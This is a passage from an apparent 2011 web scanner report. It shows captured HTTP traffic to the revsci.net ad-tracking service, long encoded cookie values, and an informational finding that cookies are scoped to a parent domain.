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; rsiPus_kpxr="MLsXtSUNZzhvJpH4+tKkOoj8ntlBfYhpEw27Sgdm26iivu1jMXrkolpihGBj4llhxoQ3etX0vIp6oTU6utPqiiY+q0sx9SZq3j9cxNBBOTGkTUzMMcfOycMr/RCdSAZbrYe7MR41Ml8P0TCrYF9UtXf6D83ChO020avNadiJ0sMNIxbXO9TZCAjf/B0U1QBTGISffV1CXeQy/Q9+Vsi1tAFjh63CWoW7lbQ1X+MM22FfbwuxngshaR0fwX/fD4W+yJj7/VWRRLYCYuhPcnKafgAst0jtLE2+Wf8kEa39J7+bN6XUByr7MX11X+aNOsJpqBYZU+6PWTFj0xxCVlJeC0H2nJ8/7vjk0U1lqVwFbfETfD25gPv0d2qBQfqzxSyR+jgdm/cye29eCnCatgRbhuRHomyUj/leb0nNtKuAIULlNeYV/gmjkZRDcj2uROQpryf7ex2bihe1gZSbYjZNrhak7q1+6hKGf6HOuM/baUhUMxe9/tF5Y7253PUv1YhZo6/80WO1vvW1yOobrIxtrdxXgDTiEkg+JHfmGdJbdNjWTnDSlwdtk9aL5TM6m74RiKi5XGC4b7u3yJT5S/AuvvgRBAHbAPCRCK6AyIFM5sL/76HM3rAmJoxjITkzacdFyI2MsH461K6ogE96hFMGAQZ58FhBsueAh9zwYYTa4WE0uj14mgUez3U4OO3OIBsNSmwdDAzjJ/LfTVWJC0KbxQF4wTVviqKj2hgaE6Oh1pzLmPv1EL8bTJnB5xiMHUgesx7wqtKQ2fl5o6PFAQUIvzdGkYBnEpNfDYz+FLWjKYxhb6ZL1MiU+aDmtXvtg8HZ6ghqHQjD4aMO749hTnc8Y8YtOlKc1IK2PtzGq1oxPJ+7weDGtjC/tKJdZpuH37zztp7oTkZEVNlv8T0JmM4AY/tYnhVf1cMLlDd5sX8/VYGbrkqKt2epyPZXnM+u9sfu2KuFOSd6D987kxMpi9vpw7N2CXi/3bTpgQc98nIcQMfUMKPt7BLH/F92yTjQDu2+2r2xLec53j0aQPOtjOXx1wU03jNtASF4RMjKkRQTgtaMp7PYKzNktZ787iF1qnjt0JA+LKNZx8cGOwgkQkSA/1plqde04kE3cfFRfHiVAtvEb4Oyv8pDUPkVjJMP1El6/XVauEAQmHKrURNiy1/1HwVGsfUASmo0Yjw+DOURA8j7F87INyrKpWwx+gz9OaG5yKVgeO/oeTiahjHeqtdGAhjT/bBR3JjQxhIBejVRTjc7RBl/shL4DEPlMvPoIzR5PfzKBQg082EG+cx7sYQApbog7ugl+RbMx+2KF9v8Wm1LHfB6q02BJzThLXcpT3ecL5eqrCxf6uaSDZmvhAFXF6m4KOc1Vua0Y1O4l0hu8D7f6De2oBu+ULi1otwrO4Z8ImdH+xwHPSk18RmJBfTJqO1PetNV/rVZYuNoP0D6Vb4FTPdGqt63p5RwNgUMCeHJBmWFWYrt8arKwK5zd6HeIeQ1ADg4yO2ij1GRKOLEWt6pBlZLuCqPm0OvD8LoqWoWOE31dSCyZXRyBXBgcY77tFuSLo7cjSu7M3YR"; rsi_us_1000000="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"; udm_0=MLv3NCEpbgpn34xwb+t4i0a3cgXtVLCla0EkErcT0mFBLMnR0C8SwiSd9pwq6b/urQy6uwL5rPtS5VxWx3Av+lIK0Lkpaj4N0MO2DnhUU4jP9xhTmoHoo0Y+f+q8hN+oFLyOmbud0hz+jq+cMwoghUynYwrgNtd+Agap/FTLc7CKGnJlB+2sP1urgbhTgD8dotZ4m56OVucAdbLbNgNMDtOQq9gJGEepfG8VW1Q9a5rIwEWo6XIMCluZo5KWK7KJpXdKAuMdT0asQPYcVvVrO2UUzxrvO5ZVIHEgPywOJ5do5WC2Q0/NcF2shDO+QqXWJdbX0OqMCfCp/uF1DI8mTtMKSOzEDgZLk+53ghmHpNlezwaRq24n3yk1axI/i4b0N9csYVpsaAUU4uyKMoWlj00kD3c2UwUiXRlylO9GVaUWDOdxl1h2tF635L8pmba2LwiVetWos0VrtRJlUmO1ehLqwSW4EKEEcT1d1To6b4bDwQqyboO20/CC91ImnZSY7f4dk+Fkg0a/iqt7HSzUf2P/bKQuLhMJR4Knq3s8RacbfTWCuKlYBEJAz+C2bkNJqUf4oZaeXZGWBH99QC8Kq3iPoMvS6/eEAZXXF25Cc5tiWi6bvIzGGduB4chYRZXmCwczXutrmI0mdYim/t0EiV3MiddLLCiwPdaARbD+dleQ7aYZZc0IWJDrUAUoqq6BNFHqZQOaoMq0c2Vdvfoyq2gE65uykjGK8DI0fQ6W0LZV/KMW+bsDCKsOfz+Ch73anSmjzQ4N2mtfQACJzfk9EWBNM9K5yTbQDP/ZDJ/8zYyErcuaX/MTs1RU5N5DeU0aAmkpYJ9thW/Hya0qFvYladCiAuWtUPOrqpcyHKJPhFT9S9HCVHVMj3nZyx0z/91FO96gSu1bjwC1k54v0ek3ge3GY4Tosdejf4GUDkRMDeGtP/O/P23UhOcwcG29rPMIxD0imB5ApBEJHRsYN43ewlfT9vlcTTPx3Qihj66o/Chm4BPtAk9t25PfQLvbLkRSsruCX9+OdKjyYq+SzvBRWlhHPO8ZSqSXntrC0QOntJkQEIKIuYAC6+qY93TunGvCP99YcUu3CJVkmsbYN+Z5/84Q1V3ByyguogZxtBkUNrBOObpCkTAXnHmtBZu5Kqm7rHy9fTkErq2IhUY1YJqszajUzu0pnqOVrr8jTIo2TEJtgt3BdnvhPEhCLoK/tNiYa8XArAO/qbLAzFHFwe3eti49gHeYkMoRyy6gVrH5qdgFcqa0YlQJiQ8XgE2XCYqnJsDnGrEFxVz5s8Y6t369w9ih76FWbImv5nAazRPQE+R15Ge7Ar1R2tkE7fuLhxj0De9ywsX84Hqjq0nGEK4HZczwHAWH7HMyIqhm4sGgPjSpwGvB8dhrk2yXb7nG3qYnMLWeIXiuyNlCi5rjvnpEfQBOFLGvK9HN8srFj0xIopOeHeqR+QvHGiHzBpPF

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_gxm3=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_5Dmj=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_2rEO=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4zOheXIMH/C1v6FY5Pio22rQpqLOQoPYd+GAD9VybyI+F4QNbwPPyvr8UGBZ6Vjnvedz63aa7pnxc5JCqQR+k2XOvNLfrCxC41VqqLiodbQjQZqBJei4H2TQvkinqMG8kBtM1kg38//fE0fhbl4QK/GL4tvC3vzfaUVMGHcMdGNMZDiIp4XW2dfAgHAn0AB43JJkmIRNHpWmlV7EGVMQOAUZTY3DQWOclImVvDGQzJdNDr9N803R6yNbqW2d3xDmBVK5G8Y5QNpT84suIacDxFRWhiYiXxb6RcnJUO2n/LXfOLncVWRHBhWNCNIPk4gU4G3WJWfrTzaR0w/9p8kAZYw/qSf0HduMZyRYt6LR1bdMVxUQzgDYC/ga7q1aqSAbYdYG+o469SYWL9OMk8vxEHcb637CHu1UrWG39L+tr8mGcL7imea6BA9t/9jx6c5vIunljkjwSkw7oZE6c9cxHJE3u6ZSqe5K7ULm42XLRCJg12GrcbV5R4Evkk8Eh3y8428t+dZDhkKZQfs6pQGSlwp/5wH0C/76A2MS1Et9/oXJ3c2aaIwXyMJ257RRIFcfpL1U2s4woUYUay7tTLmnBowyx/SmoO5VF7gHr3EqVITLWizD+JwSwrv3jkfgWAvJMCSFEmiAl6KPZbHNG37jgXCVku1jpFl4dQ8nZk9rn2v9l3cmZ2Ze33QfideBivuvdgt2Q0Ajm7NbHTt27ZRnHqp2Ze2QrczWEeEx7EO+FRH1TYLkFj7bxPfWgnX9H/Az/z5Qgw==; Domain=.revsci.net; Expires=Wed, 18-Jul-2012 16:02:35 GMT; Path=/
Set-Cookie: rtc_dIjc=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; Domain=.revsci.net; Expires=Wed, 18-Jul-2012 16:02:35 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 16:02:34 GMT
Content-Length: 886

/* AG-develop 12.7.1-48 (2011-07-13 07:11:32 UTC) */
rsinetsegs=['D08734_70056','D08734_70065','C07583_10165','C07583_10166','C07583_10174'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
va
...[SNIP]...

13.82. http://pix04.revsci.net/D08734/a1/0/3/0.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fti.com%253Fscore%253D000%2526zip%253D%2526byear1%253D%2526sex1%253D%2526ts1%253D%2526byear2%253D%2526sex2%253D%2526ts2%253D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J08781=82f4957c1a652091&J08781&0&4e3abd4a&0&&4e153a78&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUP94z+henIMH/C100a+jhgB5JQz9IY1FIa6Tm94OcJbus0+9LWt9uNg2v/oPlIcMX++9Sai/up6K4JoYxbTJtjJw67a4dAyP1rLMPPNf8+aF3KjorlwYWigFiDN8HXuymtY/8mZrBaVwjk7jhzQieeyWjePC1nNMnF9Uq187o0DW0axE8uqS+hiEBYEcYeIaWufeMRzQ6AsLOgLXVuWTOVKjAyo4BqcItT4EdQfOFZpvT8JVAHJxLHxEq4chk84g4aQoKIFE6nbu8sHtv1wbn3dcIDjQl2ic2FultsytuTkiR8SRG4+2iN1NXX+i0matqTYj7ODk66zO+jFqknjKVZxPOIXk76IkPIxfvvZuK1QWi4m8F6FSICsQJ6qcOpvHuzJZo3ZqJ2CI1FMCRsapDA5ww6SKOXpA7HkpaxvDhDNOdvuDJNcOusnbDWRzfdDrAZDP4Z6GarUTuVkOmtXCN0NyrpfnBl14Zdjh+QfP/OUpkYzsCBTbfmLykQ2f+NeLSQRx1lb+SuWvDX8zCU9cEELiQ5gA9zC2Coux7awYbO3fx80EFhxIsNcnWqm39A+9ZVe60O4/7iLv1qaXAXdlPAsw9x8hNmk2rJqahfB+k4pYuU+hwIZv7XvryMqavNb6aayfAhfD2UZqJUDEiDIcMbDb88AyjODp7s1s72qQuXfQeclkV3aMfapt78a+7vev0IzfhU8PmWD2U2IbXN87zTV4qfnhfQCyhq5V3SUTsBa44CpYg9FbhfNknZM3bSBKOlpqx6I7+qkHbCT9pdIDN8IHKTcWqzP; rtc_gxm3=MLun+AU1Zjhl58oJicYDKGOoh+glpORtThzANG1aBfZBrT1crkG1BbCYM408CuN9lQbF3aP4vgOJ1mIVRcbsqnd9em7gDHA1TIoEl2KoI2SgU4DA5EF1lXVsqfuVtURUfDlRbGMIwrPXqkTQ7ha/uqz9AYieh57Wl1R1Y1jVlCJtFijCZov3GG+/HzEWJJFPsshjNe+eXiR9QaN+nFIQwIuAnqrWN6OLs2utUQX1qLlAizz5SX1DY4ezfOcpkCrgkFCpWD1jpxUFSBd9kT0QO8lfwgL+MKkmgv9YurmtGVl4mgRDUrqi4EV2vm7677NG43lfljF81/2h3UQcvWTCROqFLqGTTGw9i7uhLLM9wmD6qiJYd+A504GkQmipymnz4zz+KJVBtht6ODBDRjch1v/Q9H0EVzkVdMH7LlvacBN6xVxFpq0/5sv3kFv9nQqHAD638rIvnoV5vHJmPEsSTPDQprR3Cqi6aS3z3efJB5Fe7NRa2Wxaw2lEgG+sN2BcFPE3dtH/7Hw70JwZoyPxbdbklPDPhWAaH0Q2BIFPO8C3p6hVpULE/9z53nAuqfuY4vymzFXDyY9vGdOvfsfoNe9C0w+FabpojVLoaKoHptlOSMDYPZV/Tmm8gD0qbz9Ql+737ttzGuAFouNSyp3mTuINVV/NGeiFZ/hPZyCj17mR7wGzyRp2a2Ayh6cUWQItrXRbEO4q19f7HHQfrXQmkxlZVigNiwD9Adfyt3Ltb9FpXu0LHvZiWWFy0I61APUr7NBHxEgIZw46qoJ3nPyYxEsj9BaAeIRk1MGz7wcwDToHsHSSqclZMH63LaUKE9lSpHKXI9N4/lZFyVpCAmpleREtf8uJwlmlrH7LSJFzPOUejuyk6cV/yIrEYLNDobIpwaLJfW+aA7kQa5TOfIWyiJpFE+znSHCvUDMrzXCYGcwryPSVn0y4vaOJrb15tx6uXNyTNhIGWsuRS4X2nehD4DtnkPoX8J+kXyt2hXK15AsoHvf8vIEOrlLEYyW2lgmGfPIScNIGRR/LpqazqArriUMpoAe9y5quzvOF0pgu6KaxnaEGxDXtvrorocQQjCjQEBaGndZRD1AJFydMGagXHQCeAXyAUge9JwnR+JCc8A9PmGUXemuw6Xmpt8F2OCf7AUBLGvy/7qHU7bKgSdmmU/YXzZvgOplXBEbBLHVd9w8j8s1y41e6E6ygpcY0ziyhak30QJ4m4hb2y3p2Z7Jr2UYsFVG/vCZB7Ma84+y0dbCQj0nIgGOKn0WdNTKrBp1drfs9H3cR0aBkJEne6gtaR9mqBVLY/5/uO+xBrKYkwbuz+6Zcxfd7iFmwF3/BCe26D3XSGXu27HurLfKh9HEBj80ZkgNwuGYAgRXr6eygjGOhv0hXPRfLc9VamnSwbqghNp9iUnPQheiFsUsThmt2sBOizCIyoQfW9Le0xoQRlfHkPVMUo87qFV1kwP5l9iUbRQczBKSINQMQbXRE6uN9Trke/NgKMHmePXzZdgwXPn2biHLED0X65s20eLfKWWD/i2ElfUNbrUhmIefj2nx6JZ4pdTdFNEKEC6lNPwUSbocNRKniI55PZ80fepxvYPyy5JdjS/7k8+vlvfDvbwGW7G7zQE68+agOyeCte/gP9X2H90N5DNmlOIxl3JnkNSoHSvrtKZM8zNqjkFv+gI5gb/ulUVbgRx/QAjlr6vkYKtm43uhLodF6M9YjmiD3i0tn33iQlFWrOMcJRoCElQ30CXCwM3ErZNwvD34sAkYLvgF1/TdrxOudjHlA4m/AYpP15ZL1fiiXYl11HYF49Ln0giCylL5k8KKkA3RtxBFoMpjMnNNSiFB3DAGjjgXfWCuGHydYc+9/EK8zUo4iohiGZiR6VDz/jeQ61jGMvfjDpD/m9F5eObUjm17xme9ojRoiv3UDPLTaaTfrD78vbBSLKDWybaIcL7jFL4cBbHqUuQjnIEafWTyFMctqyf+sirJi8V2sCI2Xm3zrYMw